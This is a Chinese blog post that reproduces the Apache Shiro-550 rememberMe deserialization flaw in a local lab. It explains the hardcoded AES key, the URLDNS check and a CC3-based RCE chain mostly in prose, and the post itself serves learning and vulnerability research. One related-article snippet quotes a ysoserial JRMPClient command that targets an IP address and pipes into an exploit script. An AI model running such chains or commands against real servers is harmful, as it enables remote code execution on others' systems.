Shiro-550反序列化

最新推荐文章于 2024-08-06 14:42:16 发布
最新推荐文章于 2024-08-06 14:42:16 发布
阅读量67 收藏
点赞数
文章标签: 安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/sunyufei_666/article/details/132454706
版权

漏洞原理

AES加密的密钥Key被硬编码在代码里,如何密钥Key被攻击者拿到,则可以直接构造恶意的对象,进行序列化,再通过AES加密和base64加密,最为cookie发送的服务端,服务端rememberMe进行解密后进行反序列化,则最终造成了反序列化漏洞

环境搭建

使用git项目在本地进行搭建

https://codeload.github.com/apache/shiro/zip/shiro-root-1.2.4

在pom.xml文件中配置

<dependency>
    <groupId>javax.servlet</groupId>
    <artifactId>jstl</artifactId>
    <version>1.2</version>
    <scope>runtime</scope>
</dependency>

 漏洞分析

shiro1.2.4版本中AbstractRememberMeManager类对传入的字节进行解密,并进行反序列化

其中deserialize方法调用了原生的readObject方法进行反序列化

继续看解密的方法

 这里看到了getDecryptionCipherKey方法,感觉就像是默认的Key值,继续跟进

 这里的decryptionCipherKey是一个常量,查看赋值的地方,最终在AbstractRememberMeManager的构造器中进行了赋值

默认是加密的一个字符串

接下来可以通过URLDNS链对漏洞进行验证

通过该链生成ser.bin文件,然后对通过python进行数据包的模拟发送

这里python代码用的白日梦组长的

将ser.bin文件进行AES加密和base64加密

这里需要把 JSESSIONID的值删除,就可以读取到rememberMe的值了

在burp中成功的进行DNS解析

 这里尝试用CC6的链子打一下

发现服务端报错了 

服务端无法加载Transformer类,这里看的白日梦组长大佬分析的,resolveClass方法中的loadClass方法不支持数组,导致链子无法使用,所以这里不能使用Transformer数组类

所以需要利用CC3中类加载的方式把payload写入字节中

 将生成的ser.bin文件加密成rememberMe值,服务端解析后

成功执行反序列化RCE

sunyufei_666
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
Shiro安全(一):Shiro-550反序列化
weixin_43263451的博客
08-01 1735
Shiro550(CVE-2016-4437),其在护网期间担任重要的角色,也有很多的利用工具。本文将详细介绍Shiro550漏洞原理其实可以将AbstractRememberMeManager#getRememberedPrincipals当做主函数,其中getRememberedSerializedIdentity方法负责base64解码,convertBytesToPrincipals负责AES解密并反序列化。......
反序列化-Shiro-550详细分析
鸣蜩十四的博客
07-18 1069
Shiro-550漏洞是攻击者直接就可以用密钥实现框架加密过程,在Cookie字段写入想要服务端执行的恶意代码,最后服务端在对cookie进行解密的时候(反序列化后)就会执行恶意代码
【Java反序列化Shiro-550漏洞分析笔记
网络安全从业者的学习笔记
01-29 1757
ShiroAES加密-->Base64加密的过程,接收后会进行Base64解密-->AES解密-->反序列化进行验证身份信息。漏洞点在于AES加密为对称加密,而加密时利用的key为固定值,这就导致,我们可以生成一条恶意的payload,进而达到RCE的目的。
shiro-550反序列化漏洞
weixin_66717977的博客
03-21 1185
基于docker的shrio反序列化漏洞复现
shiro反序列化漏洞原理分析及漏洞复现(Shiro-550/Shiro-721反序列化)
rumil的博客
09-18 1734
shiro-550主要是由shiro的rememberMe内容反序列化导致的命令执行漏洞,造成的原因是默认加密密钥是硬编码在shiro源码中,任何有权访问源代码的人都可以知道默认加密密钥。于是攻击者可以创建一个恶意对象,对其进行序列化、编码,然后将其作为cookie的rememberMe字段内容发送,Shiro 将对其解码和反序列化,导致服务器运行一些恶意代码。特征:cookie中含有rememberMe字段修复建议:更新shiro到1.2.4以上的版本。不使用默认的加密密钥,改为随机生成密钥。
Shiro反序列化原理及完整复现流程(Shiro-550/Shiro-721)
Continuejww的博客
09-27 741
Apache Shiro是一个强大且易用的**Java安全框架,**能够用于身份验证、授权、加密和会话管理。Shiro拥有易于理解的API,您可以快速、轻松地获得任何应用程序——从最小的移动应用程序到最大的网络和企业应用程序。
shiro-550反序列化漏洞原理分析详解
CleanMe的博客
01-25 1366
shiro-550反序列化漏洞原理分析详解
Shiro反序列化漏洞(Shiro-550Shiro-721)
begefefsef的博客
04-22 3102
0x01 Shiro介绍 Apache Shiro 是一个强大易用的Java安全框架,提供了认证、授权、加密和会话管理等功能,Shiro框架直观、易用、同时也能提供健壮的安全性。 Apache Shiro反序列化漏洞分为两种:Shiro-550Shiro-721 0x02 Shiro-550 反序列化漏洞 CVE-2016-4437 漏洞原理 Apache Shiro框架提供了记住密码的功能(RememberMe),用户登录成功后会生成经过加密并编码的Cookie,在服务端对rememberMe的Cook
Apache Shiro-550 反序列化漏洞复现
ZXT02的博客
03-02 1478
Apache Shiro550反序列化(CVE-2016-4437)漏洞分析、复现及修复。
SHIRO-550:Shiro RememberMe 1.2.4反序列化突破
03-10
Shiro RememberMe 1.2.4反序列化突破(SHIRO-550)commons-collections-3.2.1.jar java -jar ysoserial-0.0.6-SNAPSHOT-all.jar JRMPClient "10.10.20.166:12345" |python exp.py java -cp ysoserial-0.0.6-SNAPSHOT...
Apache-Shiro反序列化1
08-03
Shiro反序列化机制使用 Java 的反序列化机制,将用户输入的数据反序列化为 Java 对象。如果攻击者可以控制用户输入的数据,就可以将恶意对象反序列化到服务器上,执行恶意命令。 二、漏洞复现 要复现该漏洞,...
shiro反序列化脚本.zip
07-28
标题 "shiro反序列化脚本.zip" 指向的是一个与Apache Shiro安全框架相关的反序列化漏洞利用工具。Apache Shiro是一款广泛使用的Java安全框架,它提供了身份验证、授权、会话管理和加密等功能。然而,在某些版本中,...
ShiroExp-1.3.1-all.jar shiro反序列化检测工具
01-12
ShiroExp-1.3.1-all.jar shiro反序列化检测工具 我这里是用于搭建攻防演练演示环境用
shiro反序列化工具,加强版
12-27
在"shiro反序列化工具,加强版"这个主题中,我们主要关注的是Shiro框架中可能存在的反序列化漏洞以及如何利用和防范这些漏洞。 反序列化漏洞是由于程序在接收到网络传输的数据后,将其从二进制流恢复为对象时没有...
赛蓝企业管理系统 AuthToken/Index 身份认证绕过漏洞复现
0xSec
08-03 418
赛蓝企业管理系统 AuthToken/Index 接口存在身份认证绕过漏洞,未授权的远程攻击者可以利用此接口构造token绕过身份认证,使用超级管理员账户登录系统后台,造成信息泄露或者恶意破坏,使系统处于极不安全的状态。
【系统架构设计师】二十四、安全架构设计理论与实践②
帅次的博客
08-04 741
安全技术体系架构是对组织机构信息技术系统的安全体系结构的整体描述。安全技术体系架构的目标是建立可持续改进的安全技术体系架构的能力。根据网络中风险威胁的存在实体划分出5个层次的实体对象:应用、存储、主机、网络和物理。
域名安全详解
最新发布
TechEnthusiast的博客
08-06 48
域名安全是网络安全的重要组成部分,涉及多个方面。
内网安全:多种横向移动方式
8888的博客
08-03 969
DCOM:DCOM(分布式组件对象模型)是微软的一系列概念和程序接口。它支持不同的两台机器上的组件间的通信,不论它们是运行在局域网、广域网、还是Internet上。利用这个接口,客户端程序对象能够向网络中另一台计算机上的服务器程序对象发送请求,使用DCOM进行横向移动的优势之一在于,在远程主机上执行的进程将会是托管COM服务器端的软件获取DCOM列表:实验前提:1.关闭防火墙2.必须有管理员权限。
Apache Shiro 反序列化漏洞分析与利用(Shiro-550 & Shiro-721)
"本文主要讨论了Apache Shiro框架中的两个安全漏洞,Shiro-550Shiro-721,以及如何进行自动化漏洞利用。Shiro是一个流行的Java安全框架,提供认证、授权、加密和会话管理等功能。文章详细介绍了这两个漏洞的原理、...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值